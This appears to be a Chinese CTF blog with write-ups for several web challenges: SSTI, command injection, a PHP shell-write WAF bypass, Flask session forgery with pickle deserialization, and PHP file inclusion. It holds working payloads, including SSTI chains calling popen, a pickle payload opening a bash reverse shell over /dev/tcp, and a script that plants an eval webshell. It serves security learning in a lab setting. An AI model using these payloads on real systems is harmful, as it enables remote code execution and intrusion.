<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nickname=&#123;&#123;()[&quot;\x5f\x5fclass\x5f\x5f&quot;][&quot;\x5f\x5fbases\x5f\x5f&quot;][0][&quot;\x5f\x5fsubclasses\x5f\x5f&quot;]()[127][&quot;\x5f\x5finit\x5f\x5f&quot;][&quot;\x5f\x5fglobals\x5f\x5f&quot;][&quot;popen&quot;](&quot;ls -al /proc/1/fd&quot;)[&quot;read&quot;]()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>得到<code>total 0 dr-x------ 2 root root 0 Mar 9 04:34 . dr-xr-xr-x 9 root root 0 Mar 9 04:34 .. lrwx------ 1 root root 64 Mar 9 04:34 0 -&gt; /dev/null l-wx------ 1 root root 64 Mar 9 04:34 1 -&gt; pipe:[2276765047] l-wx------ 1 root root 64 Mar 9 04:34 2 -&gt; pipe:[2276765048] lr-x------ 1 root root 64 Mar 9 04:34 3 -&gt; /app/flag (deleted) lrwx------ 1 root root 64 Mar 9 04:34 4 -&gt; socket:[2276781174] lrwx------ 1 root root 64 Mar 9 04:34 5 -&gt; socket:[2281627971] lr-x------ 1 root root 64 Mar 9 04:34 6 -&gt; pipe:[2281626241] </code><br>复原文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nickname=&#123;&#123;()[&quot;\x5f\x5fclass\x5f\x5f&quot;][&quot;\x5f\x5fbases\x5f\x5f&quot;][0][&quot;\x5f\x5fsubclasses\x5f\x5f&quot;]()[127][&quot;\x5f\x5finit\x5f\x5f&quot;][&quot;\x5f\x5fglobals\x5f\x5f&quot;][&quot;popen&quot;](&quot;cat /proc/1/fd/3&quot;)[&quot;read&quot;]()&#125;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>获得flag</p>
<hr>
<p>更进一步<br>使用_frozen_importlib_external.FileLoader这个类，然后用get_data读取/proc/self/fd/3读取flag文件</p>
<h2 id="第三章-web进阶-SSTI"><a href="#第三章-web进阶-SSTI" class="headerlink" title="[第三章 web进阶]SSTI"></a>[第三章 web进阶]SSTI</h2><p>在password存在注入点<br>利用代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://510a814d-3328-4d63-ac87-2e4b4317d2c7.node4.buuoj.cn:81/?password=&#123;&#123;config.__class__.__init__.__globals__[&#x27;os&#x27;].listdir(&#x27;/&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>查看app文件夹<br>查看源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://510a814d-3328-4d63-ac87-2e4b4317d2c7.node4.buuoj.cn:81/?password=&#123;&#123;config.__class__.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;/app/server.py&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h2 id="GKCTF-2021-签到"><a href="#GKCTF-2021-签到" class="headerlink" title="[GKCTF 2021]签到"></a>[GKCTF 2021]签到</h2><p>wireshark练手<br>将流量文件通过wireshark打开<br>观察后发现是一道web题的作答过程，在请求包中发现<code>ls</code> <code>cat flag</code><br>找到第5个http响应包，获得16进制数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">64306c455357644251306c6e51554e4a5a3046355355737764306c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154576c44546d39525241707154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7162314645616b46445357644251306c6e51554e4a5a32644554545a46524530325157704e5a3046365458524e524531305257704e436e5177553078304d464e4d6444425454485177553078304d464e4d6444425454485177553078304d464e4d6444425454485177553078304d464e4d6444425454485177553078304d464e4d644442705130354e65556c7154586c4a616b31355357704e65556b4b4e6b467154576442656b31305455524e644556715458644a616b38775a566f324d6d56774e557377643074795556645a64315a485a48593152556c3051576c4e4d5546355a4777316255733254545a7162475a7763573579555552304d464e4d64444254544170304d464e4d6444425454485177553078304d464e4d6444425454485177553078304d464e4d6444425454485177553078304d464e4d6444425454485177553078304d464e4d537a42425357526159585a764e7a567462485a735130354e564530325255524e436e6f77655531334d464e4e6555467154545a524e327877596a647362584a5252484a7a5131706f516c68614d446c745647637751306c355655524a4d315a74596e4676656d3951567974736357563151303477553078304d464e4d64444254544851775530774b63336858576d786b4d5659354d544e6c4e325179576d684752324a7a576d31615a7a427363446c7064573569567974585a7a427363446c7064573569567974585a7a427363446c706457356956797458537a423354586876564531336230524e6555464454517045546a4252524534775555527356324636546c684e65444258596d593562464a48556b524f5245347759584a6b4d464a6d4f565a6162444658596e644252456c6b556d46746345524c61577832526b6c6b556d46746345524c61577832566b747754544a5a436a303955556c6f545442525245347755516f3d</span><br></pre></td></tr></table></figure>
<p>通过chef解码尝试后，是16进制+base64+翻转+base64+行翻转<br>解码后获得双写的flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">--------------------------------------------21-03-30 20:01:08         #</span><br><span class="line">时间:2021-03-30 20:###########</span><br><span class="line">窗口:*new 52 - Notepad++</span><br><span class="line">---------------------------------------------</span><br><span class="line">[回车] </span><br><span class="line">时间:2021-03-301:13</span><br><span class="line">窗口:*new 52 - Notepad++</span><br><span class="line">[回车] [回车] [回车] ffllaagg&#123;&#123;&#125;&#125;WWeell-----------</span><br><span class="line">CCCCC!!cc))[删除] [删除] 00mmee__GGkkCC44FF__mm11ssiiCCCCCCC0 20:01:13</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>去除双写后得到flag</p>
<h2 id="EasyBypass"><a href="#EasyBypass" class="headerlink" title="EasyBypass"></a>EasyBypass</h2><p>页面信息</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$comm1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;comm1&#x27;</span>];</span><br><span class="line"><span class="variable">$comm2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;comm2&#x27;</span>];</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;/\&#x27;|\`|\\|\*|\n|\t|\xA0|\r|\&#123;|\&#125;|\(|\)|&lt;|\&amp;[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is&quot;</span>, <span class="variable">$comm1</span>))</span><br><span class="line">    <span class="variable">$comm1</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;/\&#x27;|\&quot;|;|,|\`|\*|\\|\n|\t|\r|\xA0|\&#123;|\&#125;|\(|\)|&lt;|\&amp;[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is&quot;</span>, <span class="variable">$comm2</span>))</span><br><span class="line">    <span class="variable">$comm2</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$flag</span> = <span class="string">&quot;#flag in /flag&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$comm1</span> = <span class="string">&#x27;&quot;&#x27;</span> . <span class="variable">$comm1</span> . <span class="string">&#x27;&quot;&#x27;</span>;</span><br><span class="line"><span class="variable">$comm2</span> = <span class="string">&#x27;&quot;&#x27;</span> . <span class="variable">$comm2</span> . <span class="string">&#x27;&quot;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$cmd</span> = <span class="string">&quot;file <span class="subst">$comm1</span> <span class="subst">$comm2</span>&quot;</span>;</span><br><span class="line">system(<span class="variable">$cmd</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">cannot open `<span class="string">&#x27; (No such file or directory) cannot open `&#x27;</span> (No such file <span class="keyword">or</span> <span class="built_in">directory</span>) </span><br></pre></td></tr></table></figure>
<p>comm1没有过滤<code>;</code>，可以拼接命令执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?comm1=index.php&quot;;tac /fla?;&quot;</span><br></pre></td></tr></table></figure>
<p>不知道comm2有什么用，可能这不是正解。</p>
<h2 id="红明谷CTF-2021-write-shell"><a href="#红明谷CTF-2021-write-shell" class="headerlink" title="[红明谷CTF 2021]write_shell"></a>[红明谷CTF 2021]write_shell</h2><p>页面信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">function check($input)&#123;</span><br><span class="line">    if(preg_match(&quot;/&#x27;| |_|php|;|~|\\^|\\+|eval|&#123;|&#125;/i&quot;,$input))&#123;</span><br><span class="line">        // if(preg_match(&quot;/&#x27;| |_|=|php/&quot;,$input))&#123;</span><br><span class="line">        die(&#x27;hacker!!!&#x27;);</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        return $input;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function waf($input)&#123;</span><br><span class="line">  if(is_array($input))&#123;</span><br><span class="line">      foreach($input as $key=&gt;$output)&#123;</span><br><span class="line">          $input[$key] = waf($output);</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;else&#123;</span><br><span class="line">      $input = check($input);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$dir = &#x27;sandbox/&#x27; . md5($_SERVER[&#x27;REMOTE_ADDR&#x27;]) . &#x27;/&#x27;;</span><br><span class="line">if(!file_exists($dir))&#123;</span><br><span class="line">    mkdir($dir);</span><br><span class="line">&#125;</span><br><span class="line">switch($_GET[&quot;action&quot;] ?? &quot;&quot;) &#123;</span><br><span class="line">    case &#x27;pwd&#x27;:</span><br><span class="line">        echo $dir;</span><br><span class="line">        break;</span><br><span class="line">    case &#x27;upload&#x27;:</span><br><span class="line">        $data = $_GET[&quot;data&quot;] ?? &quot;&quot;;</span><br><span class="line">        waf($data);</span><br><span class="line">        file_put_contents(&quot;$dir&quot; . &quot;index.php&quot;, $data);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>pwd可以获得shell的位置<br>需要绕过一个waf<br>可以使用短标签<code>&lt;?echo?&gt;</code>写入php语句<br>使用反引号写入shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?action=upload&amp;data=&lt;?echo%09`ls%09/`?&gt;</span><br></pre></td></tr></table></figure>
<p>发现可疑文件 flllllll1112222222lag </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?action=upload&amp;data=&lt;?echo%09`cat%09/flllllll1112222222lag`?&gt;</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h2 id="HFCTF-2021-Final-easyflask-1"><a href="#HFCTF-2021-Final-easyflask-1" class="headerlink" title="[HFCTF 2021 Final]easyflask 1"></a>[HFCTF 2021 Final]easyflask 1</h2><p>根据提示获得源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3.6</span></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64decode</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template, session</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">&quot;SECRET_KEY&quot;</span>] = <span class="string">&quot;*******&quot;</span></span><br><span class="line"></span><br><span class="line">User = <span class="built_in">type</span>(<span class="string">&#x27;User&#x27;</span>, (<span class="built_in">object</span>,), &#123;</span><br><span class="line">    <span class="string">&#x27;uname&#x27;</span>: <span class="string">&#x27;test&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;is_admin&#x27;</span>: <span class="number">0</span>,</span><br><span class="line">    <span class="string">&#x27;__repr__&#x27;</span>: <span class="keyword">lambda</span> o: o.uname,</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=(<span class="params"><span class="string">&#x27;GET&#x27;</span>,</span>)</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index_handler</span>():</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> session.get(<span class="string">&#x27;u&#x27;</span>):</span><br><span class="line">        u = pickle.dumps(User())</span><br><span class="line">        session[<span class="string">&#x27;u&#x27;</span>] = u</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;/file?file=index.js&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/file&#x27;</span>, methods=(<span class="params"><span class="string">&#x27;GET&#x27;</span>,</span>)</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">file_handler</span>():</span></span><br><span class="line">    path = request.args.get(<span class="string">&#x27;file&#x27;</span>)</span><br><span class="line">    path = os.path.join(<span class="string">&#x27;static&#x27;</span>, path)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(path) <span class="keyword">or</span> os.path.isdir(path) \</span><br><span class="line">            <span class="keyword">or</span> <span class="string">&#x27;.py&#x27;</span> <span class="keyword">in</span> path <span class="keyword">or</span> <span class="string">&#x27;.sh&#x27;</span> <span class="keyword">in</span> path <span class="keyword">or</span> <span class="string">&#x27;..&#x27;</span> <span class="keyword">in</span> path <span class="keyword">or</span> <span class="string">&quot;flag&quot;</span> <span class="keyword">in</span> path:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;disallowed&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(path, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> fp:</span><br><span class="line">        content = fp.read()</span><br><span class="line">    <span class="keyword">return</span> content</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/admin&#x27;</span>, methods=(<span class="params"><span class="string">&#x27;GET&#x27;</span>,</span>)</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">admin_handler</span>():</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        u = session.get(<span class="string">&#x27;u&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">isinstance</span>(u, <span class="built_in">dict</span>):<span class="comment">#如果u对应的值是字典，会读取  u.b</span></span><br><span class="line">            u = b64decode(u.get(<span class="string">&#x27;b&#x27;</span>))</span><br><span class="line">        u = pickle.loads(u)<span class="comment">#pickle反序列化</span></span><br><span class="line">    <span class="keyword">except</span> Exception:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;uhh?&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> u.is_admin == <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;welcome, admin&#x27;</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;who are you?&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">app.run(<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">80</span>, debug=<span class="literal">False</span>)</span><br></pre></td></tr></table></figure>
<p>黑名单ban掉了<br>通过进程查询环境config</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">file?file=/proc/self/environ</span><br><span class="line">binsecret_key=glzjin22948575858jfjfjufirijidjitg3uiiuuh</span><br></pre></td></tr></table></figure>
<p>做到这里就没有头绪了<br>记录一下wp以后在研究</p>
<hr>
<p>很明显的一个session伪造加pickle反序列化rce。<br>从/proc/self/environ 获取环境变量,里面有secret_key可以拿这个secret_key伪造session。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">from base64 import b64encode</span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">User = type(&#x27;User&#x27;, (object,), &#123;</span><br><span class="line">    &#x27;uname&#x27;: &#x27;tyskill&#x27;,</span><br><span class="line">    &#x27;is_admin&#x27;: 0,</span><br><span class="line">    &#x27;__repr__&#x27;: lambda o: o.uname,</span><br><span class="line">    &#x27;__reduce__&#x27;: lambda o: (os.system, (&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.1.1/2333 0&gt;&amp;1&#x27;&quot;,))</span><br><span class="line">&#125;)</span><br><span class="line">u = pickle.dumps(User())</span><br><span class="line">print(b64encode(u).decode())</span><br></pre></td></tr></table></figure>
<p>命令执行那换上自己vps的ip，不过得在linux中运行这个脚本（我在kali用得是python2.7，发现python3和2出来的又不一样），不然生成得base64会出错，导致伪造得ssesion反序列化失败。<br>利用flask-unsign这个工具生成恶意session<br>带着这个session去访问/admin，然后服务器监听即可。</p>
<hr>
<h2 id="NPUCTF2020-EZINCLUDE"><a href="#NPUCTF2020-EZINCLUDE" class="headerlink" title="NPUCTF2020-EZINCLUDE"></a>NPUCTF2020-EZINCLUDE</h2><p>查看源代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;head&gt;&lt;/head&gt;&lt;body&gt;username/password error</span><br><span class="line">&lt;!--md5($secret.$name)===$pass --&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br></pre></td></tr></table></figure>
<p>提示将secret和name串联之后在经过md5加密和pass相同<br>其实secret已经给出，就是返回的hash值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&amp;pass=fa25e54758d5d5c1927781a6ede89f8a</span><br></pre></td></tr></table></figure>
<p>直接定向到了404页面<br>打开bp<br>果然存在一个中间页面</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;script language=&quot;javascript&quot; type=&quot;text/javascript&quot;&gt;</span><br><span class="line">           window.location.href=&quot;404.html&quot;;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;title&gt;this_is_not_fl4g_and_出题人_wants_girlfriend&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">include($_GET[&quot;file&quot;])&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>结合题目可能存在include文件包含漏洞<br>利用filter伪协议获得php代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file=php://filter/convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;config.php&#x27;</span>;</span><br><span class="line">@<span class="variable">$name</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">@<span class="variable">$pass</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;pass&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(md5(<span class="variable">$secret</span>.<span class="variable">$name</span>)===<span class="variable">$pass</span>)&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&#x27;&lt;script language=&quot;javascript&quot; type=&quot;text/javascript&quot;&gt;</span></span><br><span class="line"><span class="string">           window.location.href=&quot;flflflflag.php&quot;;</span></span><br><span class="line"><span class="string">	&lt;/script&gt;</span></span><br><span class="line"><span class="string">&#x27;</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	setcookie(<span class="string">&quot;Hash&quot;</span>,md5(<span class="variable">$secret</span>.<span class="variable">$name</span>),time()+<span class="number">3600000</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;username/password error&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;!--md5(<span class="variable">$secret</span>.<span class="variable">$name</span>)===<span class="variable">$pass</span> --&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>flflflflag.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;script language=<span class="string">&quot;javascript&quot;</span> type=<span class="string">&quot;text/javascript&quot;</span>&gt;</span><br><span class="line">           window.location.href=<span class="string">&quot;404.html&quot;</span>;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;title&gt;this_is_not_fl4g_and_åºé¢äºº_wants_girlfriend&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/data|input|zip/is&#x27;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">	<span class="keyword">die</span>(<span class="string">&#x27;nonono&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line">@<span class="keyword">include</span>(<span class="variable">$file</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;include($_GET[&quot;file&quot;])&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">CONFIG.PHP</span><br><span class="line">&lt;?php</span><br><span class="line">$secret=&#x27;%^$&amp;$#fffdflag_is_not_here_ha_ha&#x27;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>ban掉了可以直接写shell的伪协议，使用php7 的segment fault特性<br><em>php://filter/string.strip_tags=/etc/passwd<br>php执行过程中出现 Segment Fault，这样如果在此同时上传文件，那么临时文件就会被保存在/tmp目录，不会被删除</em><br>使用python脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">from io import BytesIO</span><br><span class="line">import re</span><br><span class="line">file_data=&#123;</span><br><span class="line">	&#x27;file&#x27;: BytesIO(&quot;&lt;?php eval($_POST[cmd]);&quot;)</span><br><span class="line">&#125;</span><br><span class="line">url=&quot;http://d25d00be-1f7f-4fe4-872c-c951e304b522.node3.buuoj.cn/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd&quot;</span><br><span class="line">try:</span><br><span class="line">	r=requests.post(url=url,files=file_data,allow_redirects=False)</span><br><span class="line">except:</span><br><span class="line">        print(1)</span><br></pre></td></tr></table></figure>
<p>查看临时文件夹dir.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">array(3) &#123; [0]=&gt; string(1) &quot;.&quot; [1]=&gt; string(2) &quot;..&quot; [2]=&gt; string(9) &quot;phpwQsgxe&quot; &#125; </span><br></pre></td></tr></table></figure>
<p>成功写入<br>通过tmp临时文件下利用file进行包含</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://5a5dd8e2-0b88-4f11-a159-48159217daea.node4.buuoj.cn:81/flflflflag.php?file=/tmp/phpwQsgxe</span><br><span class="line"></span><br><span class="line">cmd=phpinfo();</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
